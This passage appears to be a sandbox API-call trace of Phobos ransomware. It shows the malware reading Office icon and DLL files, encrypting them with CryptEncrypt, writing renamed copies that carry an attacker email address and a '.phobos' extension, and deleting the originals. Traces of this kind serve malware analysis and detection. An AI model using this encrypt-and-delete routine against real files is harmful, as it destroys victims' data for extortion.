hTemplateFile=0x0) returned 0x17c [0165.915] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.915] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.915] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.916] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0165.916] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.916] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5532e, lpOverlapped=0x0) returned 1 [0165.967] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x55330, dwBufLen=0x55330 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x55330) returned 1 [0165.970] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x55330, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x55330, lpOverlapped=0x0) returned 1 [0165.975] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0165.975] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.975] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0165.976] CryptDestroyKey (hKey=0xa32be8) returned 1 [0165.976] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0165.976] CryptDestroyKey (hKey=0xa32da8) returned 1 [0165.976] CloseHandle (hObject=0x17c) returned 1 [0165.976] CloseHandle (hObject=0x130) returned 1 [0165.976] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico")) returned 1 [0165.979] SetEvent (hEvent=0xe8) returned 1 [0165.979] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.979] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.980] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=25214) returned 1 [0165.980] CloseHandle (hObject=0x130) returned 1 [0165.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico")) returned 0x2020 [0165.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.980] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.980] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.980] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.980] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.980] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0165.980] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.981] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x627e, lpOverlapped=0x0) returned 1 [0166.030] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6280, dwBufLen=0x6280 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6280) returned 1 [0166.030] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6280, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x6280, lpOverlapped=0x0) returned 1 [0166.032] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0166.032] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.032] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0166.032] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.032] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0166.032] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.032] CloseHandle (hObject=0x130) returned 1 [0166.032] CloseHandle (hObject=0x17c) returned 1 [0166.032] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico")) returned 1 [0166.033] SetEvent (hEvent=0xe8) returned 1 [0166.033] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.033] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.034] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=25214) returned 1 [0166.034] CloseHandle (hObject=0x17c) returned 1 [0166.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico")) returned 0x2020 [0166.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.034] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.034] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.034] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.034] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.034] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.034] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.034] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x627e, lpOverlapped=0x0) returned 1 [0166.060] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6280, dwBufLen=0x6280 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6280) returned 1 [0166.060] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6280, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x6280, lpOverlapped=0x0) returned 1 [0166.062] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0166.062] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.062] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0166.062] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.062] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0166.062] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.062] CloseHandle (hObject=0x17c) returned 1 [0166.062] CloseHandle (hObject=0x130) returned 1 [0166.062] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico")) returned 1 [0166.063] SetEvent (hEvent=0xe8) returned 1 [0166.063] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.063] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.066] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=25214) returned 1 [0166.066] CloseHandle (hObject=0x130) returned 1 [0166.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico")) returned 0x2020 [0166.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.066] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.066] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.066] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.066] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.066] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.066] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.067] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x627e, lpOverlapped=0x0) returned 1 [0166.090] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6280, dwBufLen=0x6280 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6280) returned 1 [0166.090] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6280, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x6280, lpOverlapped=0x0) returned 1 [0166.092] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0166.092] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.092] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.092] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.092] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.092] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.092] CloseHandle (hObject=0x130) returned 1 [0166.092] CloseHandle (hObject=0x17c) returned 1 [0166.092] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico")) returned 1 [0166.093] SetEvent (hEvent=0xe8) returned 1 [0166.093] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.093] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.094] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=14688) returned 1 [0166.094] CloseHandle (hObject=0x17c) returned 1 [0166.094] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll")) returned 0x2020 [0166.094] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.095] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.095] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.095] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.095] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.095] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.095] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.095] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3960, lpOverlapped=0x0) returned 1 [0166.116] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3970, dwBufLen=0x3970 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3970) returned 1 [0166.117] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3970, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3970, lpOverlapped=0x0) returned 1 [0166.117] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0166.118] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.118] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.118] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.118] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.118] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.118] CloseHandle (hObject=0x17c) returned 1 [0166.118] CloseHandle (hObject=0x130) returned 1 [0166.118] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll")) returned 1 [0166.119] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.119] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.119] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=302944) returned 1 [0166.119] CloseHandle (hObject=0x130) returned 1 [0166.119] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll")) returned 0x2020 [0166.119] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.119] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.119] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.119] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.119] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.120] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.120] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.120] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x49f60, lpOverlapped=0x0) returned 1 [0166.151] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x49f70, dwBufLen=0x49f70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x49f70) returned 1 [0166.154] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x49f70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x49f70, lpOverlapped=0x0) returned 1 [0166.158] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0166.158] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.158] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.158] CryptDestroyKey (hKey=0xa32be8) returned 1 [0166.158] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.159] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.159] CloseHandle (hObject=0x130) returned 1 [0166.159] CloseHandle (hObject=0x17c) returned 1 